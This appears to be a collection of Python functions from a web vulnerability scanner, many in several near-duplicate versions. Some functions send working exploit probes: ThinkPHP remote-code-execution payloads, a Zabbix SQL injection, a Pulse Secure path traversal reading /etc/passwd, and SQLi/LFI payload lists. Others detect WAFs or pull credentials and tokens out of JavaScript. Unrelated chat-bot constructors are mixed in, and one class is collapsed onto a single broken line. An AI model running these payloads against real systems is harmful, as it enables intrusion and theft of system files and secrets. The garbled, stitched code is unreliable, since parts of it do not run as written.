def __init__(self, host):
    """Initialise per-host crawl state.

    Args:
        host: the target host this instance works on; kept as ``self.host``.
    """
    self.host = host
    # Accumulators filled by the crawl: page URLs, JS file URLs, findings.
    self.urls = []
    self.js = []
    self.result = []
    # Empty until something else in the class fills it in.
    self.domain = ''
    # Project HTTP client wrapper (defined elsewhere).
    self.req = Requests()
def __init__(self, host):
    """Initialise per-host crawl state.

    Args:
        host: the target host this instance works on; kept as ``self.host``.
    """
    self.host = host
    # Accumulators filled by the crawl: raw links, normalised URLs, JS files, findings.
    self.links = []
    self.urls = []
    self.js = []
    self.result = []
    # Project HTTP client wrapper (defined elsewhere).
    self.req = Requests()
def __init__(self, user_id, chat_id, peer_id, max_pred):
    """Bind this action set to one user/chat/peer triple.

    Args:
        user_id: id of the acting user.
        chat_id: chat the actions apply to; also handed to ``Requests``.
        peer_id: peer identifier; also handed to ``Requests``.
        max_pred: stored verbatim; its meaning is not visible here
            (presumably an upper bound used by a prediction feature).
    """
    print("Actions init")
    self.user_id = user_id
    self.chat_id = chat_id
    self.peer_id = peer_id
    self.max_pred = max_pred
    # Set once the user has been banned or kicked; starts cleared.
    self.is_ban_or_kik = False
    # Project API client scoped to this peer and chat (defined elsewhere).
    self.requests = Requests(peer_id, chat_id)
def __init__(self, ip):
    """Prepare a command-injection probe against one target.

    Args:
        ip: target address or URL. Stored as ``self.url`` (the attribute
            name is part of the existing interface and is kept as-is).
    """
    self.url = ip
    self.result = []
    # A random canary: the probe looks for this number echoed back in the
    # response, which is far less prone to false positives than a fixed
    # string. `random` is acceptable here -- the value is a marker, not a secret.
    self.random = random.randint(100000000, 200000000)
    canary = str(self.random)
    # OS-specific commands expected to print the canary back.
    self.win = 'set /a ' + canary
    self.linux = 'echo ' + canary
    # Seconds; presumably consumed by the request/timing logic elsewhere.
    self.timeout = 3
    self.req = Requests()
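def get_info(url):
    """Report an exposed Apache Solr admin dashboard under ``url``.

    Args:
        url: base URL of the target (scheme + host, no trailing slash).

    Returns:
        A finding string with the probed URL when ``/solr/`` answers 200 and
        the body contains both 'Solr Admin' and 'Dashboard'; otherwise
        ``None``. Request/parse errors are treated as "no finding".
    """
    try:
        req = Requests()
        target = url + '/solr/'
        r = req.get(target)
        # `==`, not `is`: `status_code is 200` is an identity test that only
        # happens to work because of CPython's small-int cache (and emits a
        # SyntaxWarning on 3.8+).
        if r.status_code == 200 and 'Solr Admin' in r.text and 'Dashboard' in r.text:
            # Output text kept verbatim (including 'leask'); callers may match on it.
            return 'Apache Solr Admin leask: ' + target
    except Exception:
        # Best-effort probe: unreachable host / bad response is not a finding.
        return None
    return None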
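def check(url, ip, ports, apps):
    """Flag an Apache Solr admin dashboard exposed at ``url``/solr/.

    Runs only when ``verify(vuln, ports, apps)`` accepts the target
    (``verify`` and ``vuln`` are module-level names defined elsewhere).
    ``ip`` is unused here; it is part of the shared check() signature.

    Returns:
        'Apache Solr Admin leask' (text kept verbatim) when the page answers
        200 with both 'Solr Admin' and 'Dashboard' in the body, else ``None``.
    """
    req = Requests()
    if verify(vuln, ports, apps):
        try:
            target = url + '/solr/'
            r = req.get(target)
            # Two fixes: `== 200` instead of the identity test `is 200`, and
            # search r.text rather than r.content -- `str in bytes` raises
            # TypeError, which the except below swallowed, so this check
            # could never report a hit.
            if r.status_code == 200 and 'Solr Admin' in r.text and 'Dashboard' in r.text:
                return 'Apache Solr Admin leask'
        except Exception:
            # Best-effort: network/parse errors mean "no finding".
            pass
    return None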
def __init__(self, dbname, apps):
    """Initialise directory-scan state for one target.

    Args:
        dbname: name of the wordlist/database this scan draws from.
        apps: detected application fingerprints for the target.
    """
    self.dbname = dbname
    self.apps = apps
    # Baseline "not found" signature, filled in later by the scan logic.
    self.notstr = ''
    self.notlen = ''
    self.goto = ''
    self.title = ''
    # Findings collected as JSON-able records.
    self.outjson = []
    self.req = Requests()
def check(url, ip, ports, apps):
    """ThinkPHP 5.x RCE probe via the ``invokefunction`` route.

    This is an active exploit attempt, not a version check: the payload asks
    the target to run ``phpinfo()`` through ``call_user_func_array``. It runs
    only when module-level ``verify(vuln, ports, apps)`` accepts the target.
    ``ip`` is unused here.

    Returns:
        'thinkphp5_rce_1 | <url>' when the response shows phpinfo() output
        ('PHP Version' or 'PHP Extension Build'), otherwise ``None``.
    """
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    route = r"/index.php/?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
    try:
        body = req.get(url + route).text
    except Exception:
        # Best-effort probe: any request failure is "not vulnerable".
        return None
    if 'PHP Version' in body or 'PHP Extension Build' in body:
        return 'thinkphp5_rce_1 | ' + url
    return None
def __init__(self, dbname):
    """Initialise directory-scan state for one target.

    Args:
        dbname: name of the wordlist/database this scan draws from.
    """
    self.dbname = dbname
    # Baseline "not found" signature, filled in later by the scan logic.
    self.notstr = ''
    self.notlen = ''
    self.goto = ''
    self.title = ''
    # Comma-separated extensions the scan substitutes into paths.
    self.ext = 'asp,php'
    # Findings collected as JSON-able records.
    self.outjson = []
    self.req = Requests()
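def check(url, ip, ports, apps):
    """Probe for CVE-2016-10134 (Zabbix jsrpc.php ``profileIdx2`` SQL injection).

    Runs only when module-level ``verify(vuln, ports, apps)`` accepts the
    target. ``ip`` is unused here. The injected ``updatexml(1,md5(0x11),1)``
    is expected to surface part of the md5 value in a database error message.

    Returns:
        'CVE-2016-10134 zabbix sqli:<url>' when the response contains the
        expected md5 fragment or a generic 'SQL error ' string, else ``None``.
    """
    req = Requests()
    if verify(vuln, ports, apps):
        # The original read `screen.get×tamp=`: the `&times` of `&timestamp`
        # had been turned into the HTML entity × (U+00D7), corrupting the
        # query string and dropping the parameter. Restored to `&timestamp=`.
        payload = (
            r"/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083"
            r"&pageFile=history.php&profileIdx=web.item.graph"
            r"&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23"
            r"&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
        )
        try:
            r = req.get(url + payload)
            if ('ed733b8d10be225eceba344d533586' in r.text) or ('SQL error ' in r.text):
                return 'CVE-2016-10134 zabbix sqli:' + url
        except Exception:
            # Best-effort probe: request failures are "not vulnerable".
            pass
    return None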
def check(url, ip, ports, apps):
    """Probe for CVE-2019-11510 (Pulse Connect Secure arbitrary file read).

    Requests ``/etc/passwd`` through the known ``dana-na`` path-traversal
    route. Runs only when module-level ``verify(vuln, ports, apps)`` accepts
    the target; ``ip`` is unused here.

    Returns:
        'CVE-2019-11510 Pulse Connect Secure File | <url>' when the response
        contains the root passwd entry, otherwise ``None``.
    """
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    traversal = r"/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
    try:
        body = req.get(url + traversal).text
    except Exception:
        # Best-effort probe: any request failure is "not vulnerable".
        return None
    if 'root:x:0:0:root' in body:
        return 'CVE-2019-11510 Pulse Connect Secure File | ' + url
    return None
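def get_info(url):
    """Look for an exposed phpinfo() page under ``url``.

    Tries each suffix in module-level ``path`` and stops at the first page
    that answers 200 and looks like phpinfo output.

    Returns:
        'phpinfo leaks: <url><path>' for the first hit, else ``None``.
    """
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200 and ('<title>phpinfo()' in r.text or 'php_version' in r.text):
                return 'phpinfo leaks: ' + url + i
    except Exception:
        # Narrowed from a bare `except:`, which also swallowed KeyboardInterrupt
        # and SystemExit and made the scanner hard to stop. Request errors are
        # still treated as "no finding".
        pass
    return None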
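def get_info(url):
    """Look for leaked non-HTML, non-JSON files under ``url``.

    Tries each suffix in module-level ``path``; a 200 response whose body
    contains no ``<html>`` tag and does not start like a JSON object is handed
    to module-level ``verify`` for the final decision.

    Returns:
        'leaks : <url><path>' for the first accepted hit, else ``None``.
    """
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code != 200 or '<html>' in r.text:
                continue
            # JSON-looking bodies are API responses, not leaked files.
            if re.search(r'{"\w+":', r.text):
                continue
            if verify(r.text):
                return 'leaks : ' + url + i
    except Exception:
        # Narrowed from a bare `except:` (which also ate KeyboardInterrupt);
        # request errors remain "no finding".
        pass
    return None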
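def get_info(url):
    """Look for leaked non-HTML, non-JSON files under ``url``.

    Tries each suffix in module-level ``path``; a 200 response with no
    ``<html`` marker and none of the common HTML/JSON/status-page fragments
    is handed to module-level ``verify`` for the final decision.

    Returns:
        'leaks : <url><path>' for the first accepted hit, else ``None``.
    """
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code != 200 or '<html' in r.text:
                continue
            # Rule out JSON objects, HTML fragments and nginx status pages.
            if re.search(r'{"\w+":|<head>|<form\s|<div\s|<input\s|<html|</a>|Active connections', r.text):
                continue
            if verify(r.text):
                return 'leaks : ' + url + i
    except Exception:
        # Narrowed from a bare `except:` (which also ate KeyboardInterrupt);
        # request errors remain "no finding".
        pass
    return None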
def check(url, ip, ports, apps):
    """ThinkPHP 5.0.23 RCE probe (``_method=__construct`` filter abuse).

    Active exploit attempt: the POST body sets ``filter[]=system`` so the
    framework runs ``echo "<random_num>"`` on the target; the echoed nonce in
    the response proves execution. Runs only when module-level
    ``verify(vuln, ports, apps)`` accepts the target; ``ip`` is unused here.
    ``random_num`` is a module-level value (assumed to be a str -- an int
    would make `in r.text` raise TypeError, which the except would swallow).

    Returns:
        'thinkphp_5_0_23_rce | <url>' on a confirmed echo, otherwise ``None``.
    """
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    body = r'_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "{}"'.format(random_num)
    form_headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    try:
        resp = req.request(url + '/index.php?s=captcha', 'post', data=body, headers=form_headers)
        if random_num in resp.text:
            return 'thinkphp_5_0_23_rce | ' + url
    except Exception:
        # Best-effort probe: request failures are "not vulnerable".
        pass
    return None
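def check(url, ip, ports, apps):
    """Probe for the Django < 2.0.8 open redirect via a protocol-relative URL.

    Appends ``//www.example.com`` to ``url`` and reports a hit when the
    response is a redirect whose Location points at that host. Relies on the
    ``Requests`` wrapper not following redirects (otherwise ``is_redirect``
    would never be set -- assumption, not visible here). Runs only when
    module-level ``verify(vuln, ports, apps)`` accepts the target; ``ip`` is
    unused.

    Returns:
        The finding string (kept verbatim) on a hit, otherwise ``None``.
    """
    req = Requests()
    if verify(vuln, ports, apps):
        payload = "//www.example.com"
        try:
            r = req.get(url + payload)
            # A redirect without a Location header previously raised
            # TypeError (`str in None`) that the except swallowed; default
            # to '' so the check simply fails closed.
            location = r.headers.get('Location') or ''
            if r.is_redirect and 'www.example.com' in location:
                return 'Django < 2.0.8 任意URL跳转漏洞'
        except Exception:
            # Best-effort probe: request failures are "not vulnerable".
            pass
    return None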
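def checkwaf(url):
    """Detect a WAF in front of ``url``.

    Checks the plain page first, then each probe suffix in module-level
    ``payload``; module-level ``verify(headers, body)`` returns a WAF name or
    'NoWAF'. Only the first 10000 characters of each body are examined.

    Returns:
        The first non-'NoWAF' verdict, 'NoWAF' when nothing is detected, and
        'NoWAF' on any request error.
    """
    try:
        req = Requests()
        r = req.get(url)
        result = verify(r.headers, r.text[:10000])
        if result != 'NoWAF':
            return result
        for probe in payload:
            r = req.get(url + probe)
            result = verify(r.headers, r.text[:10000])
            # Return as soon as one probe trips the WAF. The original kept
            # looping and returned only the LAST verdict, so a WAF that
            # blocked an early probe but let the last one through was
            # reported as 'NoWAF'.
            if result != 'NoWAF':
                return result
        return result
    except Exception:
        # Narrowed from a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit. Errors still read as no WAF seen.
        return 'NoWAF'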
def __init__(self, update_object):
    """Bind the controller to one incoming update and dispatch on user level.

    Args:
        update_object: mapping with at least 'from_id', 'text' and 'peer_id'
            (those are the keys read here; the full schema is not visible).
    """
    print("Controller init")
    update = update_object
    self.u = update
    self.user = find_user(update['from_id'])
    self.text = update['text']
    self.command = self.payloadParse()
    self.r = Requests(update['peer_id'])
    # NOTE(review): payloadParse() is called a second time with its result
    # discarded. Kept so behaviour is unchanged, but unless it has side
    # effects that depend on self.r existing, this call is redundant.
    self.payloadParse()
    self.switchLevel(self.user.level)
def robots(url):
    """Fetch ``url``/robots.txt and return the unique path-like tokens in it.

    Returns:
        A de-duplicated list (order unspecified) of ``/...`` tokens when the
        file answers 200 and is not HTML and contains at least one token;
        otherwise ``None``. Missing/None responses are ignored; other errors
        are logged and also yield ``None``.
    """
    try:
        resp = Requests().get(url + '/robots.txt')
        if resp.status_code == 200 and '<html' not in resp.text:
            paths = re.findall(r"/[\w\?\.=/]+/?", resp.text)
            if paths:
                return list(set(paths))
    except (UnboundLocalError, AttributeError):
        # Presumably the wrapper returned None instead of a response.
        pass
    except Exception as e:
        logging.exception(e)
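def get_info(url):
    """Look for an admin/login page under ``url``.

    Tries each suffix in module-level ``path``. A 200 page is reported when it
    contains login-ish markers (English or Chinese) and module-level
    ``verify`` accepts the body; a 403 is reported as a possible login page.

    Returns:
        'Admin_Page : <url><path>' or 'May be the login page : <url><path>'
        for the first hit, else ``None``.
    """
    markers = r'admin|login|manager|登陆|管理|后台|type="password"|入口|admin_passwd'
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200:
                if re.search(markers, r.text, re.S) and verify(r.text):
                    return 'Admin_Page : ' + url + i
            elif r.status_code == 403:
                return 'May be the login page : ' + url + i
    except Exception:
        # Narrowed from a bare `except:` (which also ate KeyboardInterrupt);
        # request errors remain "no finding".
        pass
    return None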
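class JsLeaks():
    """Scan JavaScript files for leaked URLs, e-mails, credentials, hashes,
    IPs, cloud-storage hosts, phone numbers and domains.

    Findings are accumulated in ``self.result`` as '<js url> Leaks: <match>'.
    """

    # Matches that are almost always noise: version-like dotted numbers,
    # Google assets and image file names.
    _NOISE = re.compile(r'^0\d\.\d+\.\d+\.\d+|google|png$|gif$|jpg$|\b\d+\.\d+\.0\.0')

    # One pattern per leak category. Where a pattern has a capture group,
    # re.findall returns just that group.
    _PATTERNS = (
        # URLs / file references with an interesting extension
        r'\b(?:http:|https:)(?:[\w/\.]+)?(?:[a-zA-Z0-9_\-\.]{1,})\.(?:php|asp|ashx|jspx|aspx|jsp|json|action|html|txt|xml|do|js)\b',
        r'([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^\"|\']{0,}|))',
        # e-mail addresses
        r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+',
        # token / password style assignments, e.g. token = xxxxxxxx or "apikey" : "xssss"
        r'\b(?:secret|secret_key|token|secret_token|auth_token|access_token|username|password|aws_access_key_id|aws_secret_access_key|secretkey|authtoken|accesstoken|access-token|authkey|client_secret|bucket|extr|HEROKU_API_KEY|SF_USERNAME|PT_TOKEN|id_dsa|clientsecret|client-secret|encryption-key|pass|encryption_key|encryptionkey|secretkey|secret-key|bearer|JEKYLL_GITHUB_TOKEN|HOMEBREW_GITHUB_API_TOKEN|api_key|api_secret_key|api-key|private_key|client_key|client_id|sshkey|ssh_key|ssh-key|privatekey|DB_USERNAME|oauth_token|irc_pass|dbpasswd|xoxa-2|xoxrprivate-key|private_key|consumer_key|consumer_secret|access_token_secret|SLACK_BOT_TOKEN|slack_api_token|api_token|ConsumerKey|ConsumerSecret|SESSION_TOKEN|session_key|session_secret|slack_token|slack_secret_token|bot_access_token|passwd|api|eid|sid|qid|api_key|apikey|userid|user_id|user-id|uid|private|BDUSS|stoken|imei|imsi|nickname|appid|uname)["\s]*(?::|=|=:|=>)["\s]*[a-z0-9A-Z]{8,64}',
        # bare 32-hex strings (md5-like)
        r'(?:[^a-fA-F\d]|\b)(?:[a-fA-F\d]{32})(?:[^a-fA-F\d]|\b)',
        # quoted two-segment paths such as "/task/router"
        r'"(/\w{3,}/\w{3,})"',
        # IPv4 addresses
        r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b',
        # cloud storage / hosting endpoints
        r'[\w]+\.cloudfront\.net',
        r'[\w\-.]+\.appspot\.com',
        r'[\w\-.]*s3[\w\-.]*\.?amazonaws\.com\/?[\w\-.]*',
        r'([\w\-.]*\.?digitaloceanspaces\.com\/?[\w\-.]*)',
        r'(storage\.cloud\.google\.com\/[\w\-.]+)',
        r'([\w\-.]*\.?storage.googleapis.com\/?[\w\-.]*)',
        # mobile phone numbers (mainland-China prefixes). The trailing comma was
        # missing in the original, so this literal and the domain literal below
        # were silently concatenated into one pattern that matched neither.
        r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}',
        # domain names with a closed list of TLDs
        r'((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+(?:biz|cc|club|cn|com|co|edu|fun|group|info|ink|kim|link|live|ltd|mobi|net|online|org|pro|pub|red|ren|shop|site|store|tech|top|tv|vip|wang|wiki|work|xin|xyz|me))',
    )

    def __init__(self):
        self.result = []
        # Project HTTP client wrapper (defined elsewhere).
        self.req = Requests()

    def pool(self, urls):
        """Scan ``urls`` concurrently (20 workers) and return all findings.

        ``as_completed`` is given a 3 s budget; its TimeoutError only stops
        result collection -- leaving the ``with`` block still calls
        ``shutdown(wait=True)``, so slow workers are joined regardless.
        """
        try:
            with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
                pending = {executor.submit(self.get_js, u): u for u in urls}
                for future in concurrent.futures.as_completed(pending, timeout=3):
                    future.result()
        except (EOFError, concurrent.futures.TimeoutError):
            pass
        except Exception as e:
            logging.exception(e)
        return self.result

    @staticmethod
    def _is_noise(item):
        """True when ``item`` matches the noise filter (images, google, version numbers)."""
        return JsLeaks._NOISE.search(item) is not None

    def verify(self, text):
        """Return True when no entry of ``text`` looks like noise.

        The original returned True only when *every* entry matched the noise
        pattern, which kept junk and dropped real findings; the sense is fixed
        here. An empty list is accepted.
        """
        return not any(self._is_noise(i) for i in text)

    def get_js(self, url):
        """Fetch one JS file and append every non-noise match to ``self.result``."""
        r = self.req.get(url)
        # Cap the scanned body so huge bundles do not pin a worker.
        body = r.text[:100000]
        for pattern in self._PATTERNS:
            # Filter item by item so one noisy match does not discard the
            # real findings returned by the same pattern.
            for match in re.findall(pattern, body, re.M | re.I):
                if not self._is_noise(match):
                    self.result.append(url + ' Leaks: ' + match)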
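def ipinfo(host):
    """Collect historical IPs for a domain from viewdns.info's IP-history page.

    Note the OPSEC implication: the target domain is sent to a third-party
    service. An IP literal is not looked up at all. Each scraped address is
    kept only when module-level ``iscdn(ip)`` is truthy (its exact sense is
    defined elsewhere).

    Returns:
        A list of dotted-quad strings (possibly empty).
    """
    out = []
    # Dotted-quad hosts are already IPs; nothing to resolve.
    if re.search(r'\d+\.\d+\.\d+\.\d+', host):
        return out
    req = Requests()
    try:
        r = req.get('https://viewdns.info/iphistory/?domain={}'.format(host))
        # Addresses sit in the first cell of each result row.
        found = re.findall(r'(?<=<tr><td>)\d+\.\d+\.\d+\.\d+(?=</td><td>)', r.text, re.S | re.I)
        for ip in found:
            if iscdn(ip):
                out.append(ip)
    except Exception:
        # Narrowed from a bare `except:` (which also ate KeyboardInterrupt);
        # lookup failures yield whatever was collected so far.
        pass
    return out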
def web_info(url):
    """Gather basic recon for ``url``: WAF, IP/geo, page fingerprint, OS guess.

    Returns:
        ``(data, apps, title)`` where ``data`` is ``{host: {...}}`` with keys
        'WAF', 'Ipaddr', 'Address', 'Webinfo', 'OS'. When the page fetch or
        fingerprint fails the error is logged, ``Webinfo`` is ``{}`` and the
        WAF field is forced to the string 'None'.
    """
    host = parse_host(url)
    ipaddr = parse_ip(host)
    url = url.strip('/')
    address = geoip(ipaddr)
    wafresult = checkwaf(url)
    client = Requests()
    try:
        resp = client.get(url)
        # Let chardet choose the decoding so non-UTF-8 pages render sensibly.
        resp.encoding = chardet.detect(resp.content).get('encoding')
        webinfo = WebPage(resp.url, resp.text, resp.headers).info()
    except Exception as e:
        logging.exception(e)
        webinfo = {}
    if webinfo:
        report = (
            ('title', webinfo.get('title')),
            ('Fingerprint', webinfo.get('apps')),
            ('Server', webinfo.get('server')),
            ('WAF', wafresult),
        )
        for label, value in report:
            console('Webinfo', host, '{}: {}\n'.format(label, value))
    else:
        webinfo = {}
        wafresult = 'None'
    # OS detection is only attempted when iscdn(host) is truthy; the helper's
    # exact sense is defined elsewhere.
    osname = osdetect(host) if iscdn(host) else None
    data = {
        host: {
            'WAF': wafresult,
            'Ipaddr': ipaddr,
            'Address': address,
            'Webinfo': webinfo,
            'OS': osname,
        }
    }
    return data, webinfo.get('apps'), webinfo.get('title')
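def checkwaf(url):
    """Detect a WAF in front of ``url``.

    The plain page is checked first, then each probe suffix in module-level
    ``payload``; module-level ``verify(headers, body)`` yields a WAF name or
    'NoWAF'. Only the first 10000 characters of each body are examined.

    Returns:
        The first non-'NoWAF' verdict; otherwise 'CDN IP' when module-level
        ``iscdn(host)`` is falsy (its exact sense is defined elsewhere), else
        'NoWAF'. Missing/None responses are ignored; other errors are logged.
    """
    try:
        req = Requests()
        r = req.get(url)
        result = verify(r.headers, r.text[:10000])
        # A WAF seen on the plain page was previously not returned: the code
        # only returned from inside the probe loop, so that verdict fell
        # through to the CDN/'NoWAF' fallback below.
        if result != 'NoWAF':
            return result
        for probe in payload:
            r = req.get(url + probe)
            result = verify(r.headers, r.text[:10000])
            if result != 'NoWAF':
                return result
    except (UnboundLocalError, AttributeError):
        # Presumably the wrapper returned None instead of a response.
        pass
    except Exception as e:
        logging.exception(e)
    host = parse_host(url)
    if not iscdn(host):
        return 'CDN IP'
    return 'NoWAF'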
def verify_https(url):
    """Work out whether ``url`` is reachable over https or http.

    The input is reduced to its netloc (or path, for scheme-less input). An
    https GET that yields 301/302 is retried with a ``www.`` prefix, which is
    preferred when it answers 200. When https fails in any way, http is tried.

    Returns:
        The reachable 'https://...' or 'http://...' form, or ``None`` when
        neither request succeeds.
    """
    client = Requests()
    parsed = parse.urlparse(url)
    if parsed.netloc:
        bare = parsed.netloc
    elif parsed.path:
        bare = parsed.path
    else:
        bare = url
    try:
        resp = client.get('https://' + bare)
        # Raises AttributeError when the wrapper handed back None.
        getattr(resp, 'status_code')
        if resp.status_code == 302 or resp.status_code == 301:
            www = 'https://www.' + bare
            if client.get(www).status_code == 200:
                return www
        return 'https://' + bare
    except Exception:
        try:
            client.get('http://' + bare)
            return 'http://' + bare
        except Exception:
            pass
def verify_https(url):
    """Work out whether ``url`` is reachable over https or http.

    A URL that already carries a scheme is returned as-is when a GET succeeds.
    Otherwise the netloc (or path) is tried over https; when that yields no
    response object (AttributeError on ``status_code``), http is tried. Each
    success is echoed through ``console``; other errors are logged.

    Returns:
        The reachable URL form, or ``None`` when nothing succeeded.
    """
    client = Requests()
    if '://' in url:
        try:
            client.get(url)
            return url
        except Exception:
            pass
    host = parse_host(url)
    parsed = parse.urlparse(url)
    bare = parsed.netloc or parsed.path or url
    secure = 'https://' + bare
    try:
        resp = client.get(secure)
        # Raises AttributeError when the wrapper handed back None.
        getattr(resp, 'status_code')
        console('Verify', host, secure + '\n')
        return secure
    except AttributeError:
        plain = 'http://' + bare
        try:
            client.get(plain)
            console('Verify', host, plain + '\n')
            return plain
        except Exception:
            pass
    except Exception as e:
        logging.exception(e)
class SqlLfi(): def __init__(self): self.result = [] self.req = Requests() def sqli(self, qurl): payload = { "'", "%2527", "')", " AnD 7738=8291" } LFI_payload = {'../../../../etc/passwd|root:x', '../../../../etc/group|root:x', 'random.php|Failed opening', 'file://c:/windows/win.ini|drivers', '/proc/self/environ|USER='******'{} SQLi:{}'.format(dbms, qurl) self.result.append(result) raise Getoutofloop for i in LFI_payload: url = '' lfi, pattern = i.split('|') if re.search(r'=\w+\.\w{3}$', qurl): url = re.sub(r'\w+\.\w{3}$', lfi, qurl) elif re.search('=\w+', qurl): url = re.sub(r'\w+$', lfi, qurl) r = self.req.get(url) if re.search(pattern, r.text, re.S): self.result.append('LFI: {}'.format(url)) break except: pass def pool(self, urls): host = dedup_url(urls) with concurrent.futures.ThreadPoolExecutor( max_workers=30) as executor: executor.map(self.sqli, host) return self.result
def web_info(url):
    """Gather recon for ``url``: WAF, IP/geo, fingerprint, OS guess, passive DNS, reverse IP.

    Returns:
        ``(data, apps)`` where ``data`` is ``{host: {...}}`` with keys 'WAF',
        'Ipaddr', 'Address', 'Webinfo', 'OS'. ``Webinfo`` always carries
        'pdns' (from ``virustotal``) and 'reverseip' (from ``reverse_domain``).
        When the page fetch or fingerprint fails the exception is silently
        dropped, ``Webinfo`` starts empty and the WAF field becomes 'None'.
    """
    host = parse_host(url)
    ipaddr = parse_ip(host)
    url = url.strip('/')
    address = geoip(ipaddr)
    wafresult = checkwaf(url)
    client = Requests()
    try:
        resp = client.get(url)
        # Let chardet choose the decoding so non-UTF-8 pages render sensibly.
        resp.encoding = chardet.detect(resp.content).get('encoding')
        webinfo = WebPage(resp.url, resp.text, resp.headers).info()
    except Exception:
        # Kept silent as in the original; consider logging here.
        webinfo = {}

    def report(label, value):
        console('Webinfo', host, '{}: {}\n'.format(label, value))

    if webinfo:
        report('Title', webinfo.get('title'))
        report('Fingerprint', webinfo.get('apps'))
        report('Server', webinfo.get('server'))
        report('WAF', wafresult)
    else:
        webinfo = {}
        wafresult = 'None'
    # OS detection is only attempted when iscdn(host) is truthy; the helper's
    # exact sense is defined elsewhere.
    osname = osdetect(host) if iscdn(host) else None
    # Both lookups go to external services (passive DNS, reverse IP).
    webinfo.update({"pdns": virustotal(host)})
    webinfo.update({"reverseip": reverse_domain(host)})
    data = {
        host: {
            'WAF': wafresult,
            'Ipaddr': ipaddr,
            'Address': address,
            'Webinfo': webinfo,
            'OS': osname,
        }
    }
    return data, webinfo.get('apps')
def __init__(self, dbname, apps, host, title):
    """Initialise a directory/path scan for one host.

    Args:
        dbname: name of the wordlist/database the scan draws from.
        apps: detected application fingerprints for the target.
        host: target host; ``self.get_urls(host)`` builds the candidate list.
        title: page title of the target (used by the scan logic elsewhere).
    """
    self.dbname = dbname
    self.apps = apps
    self.title = title
    self.host = host
    # Randomised User-Agent from the project helper.
    self.headers = get_ua()
    self.outjson = []
    self.wordlist = []
    # Candidate URLs are built before the HTTP client exists; keep that order.
    self.urls = self.get_urls(self.host)
    self.req = Requests()
    # Request paths in random order so the scan is harder to trace/fingerprint.
    random.shuffle(self.urls)
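def checkwaf(url):
    """Detect a WAF in front of ``url``.

    Returns 'CDN IP' immediately when module-level ``iscdn(host)`` is falsy
    (the helper's exact sense is defined elsewhere). Otherwise the plain page
    is checked, then each probe suffix in module-level ``payload``;
    module-level ``verify(headers, body)`` yields a WAF name or 'NoWAF'.

    Returns:
        'CDN IP', the first non-'NoWAF' verdict, or 'NoWAF'. On a request
        error the function previously fell off the end and returned ``None``
        even though ``result`` was initialised to 'NoWAF'; the fallback is
        now always returned so callers get a string.
    """
    result = 'NoWAF'
    host = parse_host(url)
    if not iscdn(host):
        return 'CDN IP'
    try:
        req = Requests()
        r = req.get(url)
        result = verify(r.headers, r.text)
        if result == 'NoWAF':
            for probe in payload:
                r = req.get(url + probe)
                result = verify(r.headers, r.text)
                if result != 'NoWAF':
                    break
    except (UnboundLocalError, AttributeError):
        # Presumably the wrapper returned None instead of a response.
        result = 'NoWAF'
    except Exception as e:
        logging.exception(e)
        result = 'NoWAF'
    return result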